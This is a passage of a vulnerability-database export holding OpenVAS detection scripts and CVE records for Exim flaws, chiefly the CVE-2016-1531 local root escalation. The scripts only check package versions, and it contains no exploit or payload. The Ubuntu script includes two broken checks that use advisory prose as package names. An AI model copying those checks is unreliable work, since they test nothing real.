+0100 (Sat, 12 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2016:0721-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to exim 4.86.2 fixes the following issues:\n\n * CVE-2016-1531: local privilege escalation for set-uid root exim when\n using 'perl_startup' (boo#968844)\n\n Important: Exim now cleans the complete execution environment by default.\n This affects Exim and subprocesses such as transports calling other\n programs. The following new options are supported to adjust this behaviour:\n\n * keep_environment\n\n * add_environment A warning will be printed upon startup if none of these\n are configured.\n\n Also includes upstream changes, improvements and bug fixes:\n\n * Support for using the system standard CA bundle.\n\n * New expansion items $config_file, $config_dir, containing the file and\n directory name of the main configuration file. Also $exim_version.\n\n * New 'malware=' support for Avast.\n\n * New 'spam=' variant option for Rspamd.\n\n * Assorted options on malware= and spam= scanners.\n\n * A commandline option to write a comment into the logfile.\n\n * A logging option for slow DNS lookups.\n\n * New ${env { variable }} expansion.\n\n * A non-SMTP authenticator using information from TLS client\n certificates.\n\n * Main option 'tls_eccurve' for selecting an Elliptic Curve for TLS.\n\n * Main option 'dns_trust_aa' for trusting your local nameserver at the\n same level as DNSSEC.\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0721-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:26", "description": "A local root privilege escalation\nvulnerability was found in Exim, Debian", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3517-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703517", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3517.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3517-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703517\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1531\");\n script_name(\"Debian Security Advisory DSA 3517-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 00:00:00 +0100 (Mon, 14 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3517.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8|9)\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution\n(wheezy), this problem has been fixed in version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"A local root privilege escalation\nvulnerability was found in Exim, Debian's default mail transfer agent, in\nconfigurations using the perl_startup option (Only Exim via\nexim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:05", "description": "Exim < 4.86.2 Local Root Privilege Escalation", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Exim Local Root / Privilege Escalation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310105568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_cve_2016_1531.nasl 12083 2018-10-25 09:48:10Z cfischer $\n#\n# Exim Local Root / Privilege Escalation Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105568\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12083 $\");\n\n script_name(\"Exim Local Root / Privilege Escalation Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.exim.org/static/doc/CVE-2016-1531.txt\");\n\n script_tag(name:\"insight\", value:\"When Exim installation has been compiled with Perl support and contains a perl_startup configuration variable it can be exploited by malicious local attackers to gain root privileges.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.86.2 or newer.\");\n\n script_tag(name:\"summary\", value:\"Exim < 4.86.2 Local Root Privilege Escalation\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 11:48:10 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 13:17:46 +0100 (Tue, 15 Mar 2016)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_family(\"SMTP problems\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:version, test_version:\"4.86.2\" ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:\"4.86.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-16T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-2933-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2014-2972"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-2933-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842695\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-16 06:09:39 +0100 (Wed, 16 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2014-2972\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-2933-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n filtered environment variables when used with the perl_startup configuration\n option. If the perl_startup option was enabled, a local attacker could use this\n issue to escalate their privileges to the root user. This issue has been fixed\n by having Exim clean the complete execution environment by default on startup,\n including any subprocesses such as transports that call other programs. This\n change in behaviour may break existing installations and can be adjusted by\n using two new configuration options, keep_environment and add_environment.\n (CVE-2016-1531)\n\n Patrick William discovered that Exim incorrectly expanded mathematical\n comparisons twice. A local attacker could possibly use this issue to\n perform arbitrary file operations as the Exim user. This issue only\n affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972)\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2933-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2933-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"existing\", ver:\"installations. After performing a standard system update, the new\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"to\", ver:\"adjust the new behaviour.\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86-3ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86-3ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T03:43:15", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "id": "PRION:CVE-2016-9963", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:56:44", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "id": "PRION:CVE-2017-1000369", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:28:06", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2017-09-08T01:29:00", "id": "PRION:CVE-2016-1531", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-12-06T15:41:11", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM\nsigning key via vectors related to log files and bounce messages.\n\n#### Bugs\n\n * <https://bugs.exim.org/show_bug.cgi?id=1996>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-16T00:00:00", "id": "UB:CVE-2016-9963", "href": "https://ubuntu.com/security/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T15:22:30", "description": "Exim supports the use of multiple \"-p\" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues\nallows attackers to cause arbitrary code execution. This affects exim\nversion 4.89 and earlier. Please note that at this time upstream has\nreleased a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it\nis not known if a new point release is available that addresses this issue\nat this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "UB:CVE-2017-1000369", "href": "https://ubuntu.com/security/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T15:46:39", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain\nprivileges via the perl_startup argument.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) 